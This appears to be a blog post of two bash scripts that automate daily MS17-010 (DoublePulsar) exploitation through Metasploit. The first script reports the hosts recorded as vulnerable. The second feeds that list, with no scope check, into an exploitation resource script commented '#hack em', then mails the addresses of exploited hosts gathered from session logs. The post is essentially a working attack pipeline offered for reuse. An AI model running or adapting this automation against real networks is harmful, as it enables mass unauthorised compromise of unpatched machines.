Tuesday, October 30, 2018

automate ms17-010 exploitation better

 <find vuln hosts>  
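 #!/bin/bash
 # Daily report of hosts recorded as vulnerable in the Metasploit database.
 #
 # Steps: export the vulns table, reduce it to a de-duplicated list of IPv4
 # strings, work out which entries are new since the previous day's list,
 # and mail both the full list and the new entries.
 #
 # Outputs (all under $VULNHOSTS):
 #   vulns.msf, vulns.msf.o, vulns.msf.ip  - intermediate files
 #   vulnerablehosts.YYYYMMDD              - today's de-duplicated list
 #   changes.YYYYMMDD                      - entries not in yesterday's list
 #
 # NOTE(review): these files and both mails enumerate unpatched hosts. Keep
 # the directory readable by the operator only and confirm the mail path to
 # the recipient is protected in transit.
 VULNHOSTS=/root/doublepulsar.scan/VULNHOSTS
 TIMESTAMP=$(date "+%Y%m%d")

 # Every relative path below assumes this directory; stop instead of writing
 # reports into whatever the current directory happens to be.
 cd "$VULNHOSTS" || exit 1

 # Single source for the export path, so the msfconsole command and the
 # post-processing cannot drift apart.
 msfconsole -x "color false ; vulns -o $VULNHOSTS/vulns.msf ; exit"
 sort -u "$VULNHOSTS/vulns.msf" > "$VULNHOSTS/vulns.msf.o"

 # The pattern matches any dotted quad with 1-3 digits per field, so it also
 # accepts values above 255 and any address-like string anywhere in the
 # export, not only a host column.
 grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' "$VULNHOSTS/vulns.msf.o" > "$VULNHOSTS/vulns.msf.ip"
 sort -u "$VULNHOSTS/vulns.msf.ip" > "$VULNHOSTS/vulnerablehosts.$TIMESTAMP"

 # Start from an empty changes file so the second mail always has a body to
 # read, even when no earlier list exists.
 : > "changes.$TIMESTAMP"

 # Compare only against earlier host lists. The previous loop walked every
 # path returned by `find . -mtime 1` (yesterday's changes file included),
 # truncated the output on each pass so only the last comparison survived,
 # and relied on sdiff's '>' marker, which is not printed when a new address
 # is paired with a removed one on the same row. Both inputs are `sort -u`
 # output, so comm -13 yields exactly the lines present only in today's list.
 while IFS= read -r -d '' file; do
  comm -13 "$file" "vulnerablehosts.$TIMESTAMP" >> "changes.$TIMESTAMP"
 done < <(find . -type f -name 'vulnerablehosts.*' -mtime 1 -print0)

 mail -s "vulnerable hosts $TIMESTAMP" me@hell < "vulnerablehosts.$TIMESTAMP"
 mail -s "vulnerable hosts difference $TIMESTAMP" me@hell < "changes.$TIMESTAMP"

 # Cleanup is left disabled, as in the original; the :? guard keeps the glob
 # from expanding against / if VULNHOSTS is ever empty.
 #rm -rf "${VULNHOSTS:?}"/vulns.*
 #rm "${VULNHOSTS:?}/changes.$TIMESTAMP"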
   
 <post report, exploit>  
   
 #!/bin/bash
 # Second stage: swaps today's vulnerable-host list into the Metasploit work
 # directory, runs a resource script, then records which addresses appear in
 # today's session logs and mails that list.
 #
 # PROCESS   - working directory for this stage and its dated output
 # THEWICKED - directory holding the vulnerablehosts.YYYYMMDD lists
 # WORK      - Metasploit user directory
 # YESTERDAY and TOMORROW are assigned but never read in this script.
 PROCESS=/root/doublepulsar.scan/exploit
 THEWICKED=/root/doublepulsar.scan/VULNHOSTS
 TODAY=$(date '+%Y%m%d')
 YESTERDAY=$(date -d "yesterday" '+%Y%m%d')
 TOMORROW=$(date -d "next day" '+%Y%m%d')
 WORK=/root/.msf4

 # NOTE(review): neither cd nor mkdir is checked; on failure the later steps
 # still run. mkdir also fails if the script is run twice on the same day.
 # Nothing below writes into $PROCESS/logs/$TODAY; logs go to $PROCESS/$TODAY.
 cd $PROCESS/
 mkdir $PROCESS/logs/$TODAY

 # Keep a dated copy of the previous list, then overwrite it with today's.
 # NOTE(review): the list is copied exactly as the scan script produced it;
 # nothing here filters it against an approved-scope list, and a missing
 # vulnerablehosts.$TODAY leaves the previous day's list in place.
 cp $WORK/thewicked $WORK/thewicked.$TODAY
 cp $THEWICKED/vulnerablehosts.$TODAY $WORK/thewicked

 #hack em
 # Stops any running Metasploit jobs, then runs doublepulsar-loop.rc from
 # /root/.msf4. The resource script is not shown on this page; presumably it
 # reads the thewicked file written above (confirm).
 cd /root/.msf4
 msfconsole -x "color false ; jobs -K ; resource doublepulsar-loop.rc ; exit"

 # Collect addresses from session-log file names that contain today's date.
 # NOTE(review): this reports hosts with a session log today, which is only
 # presumably the same as hosts where a session opened (confirm). The same
 # loose dotted-quad pattern as the scan script is used.
 cd /root/.msf4/logs/sessions
 ls | grep $TODAY | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > $PROCESS/exploited.$TODAY

 # Archive session logs under a dated directory. The glob moves every *.log
 # in the directory, not only today's. These logs and the mail below are
 # sensitive records of access to the listed hosts; restrict who can read
 # them and how long they are kept.
 mkdir /root/doublepulsar.scan/exploit/$TODAY
 mv /root/.msf4/logs/sessions/*.log $PROCESS/$TODAY

 mail -s "doublepulsar vuln hosts exploited $TODAY" me@hell < $PROCESS/exploited.$TODAY

 exit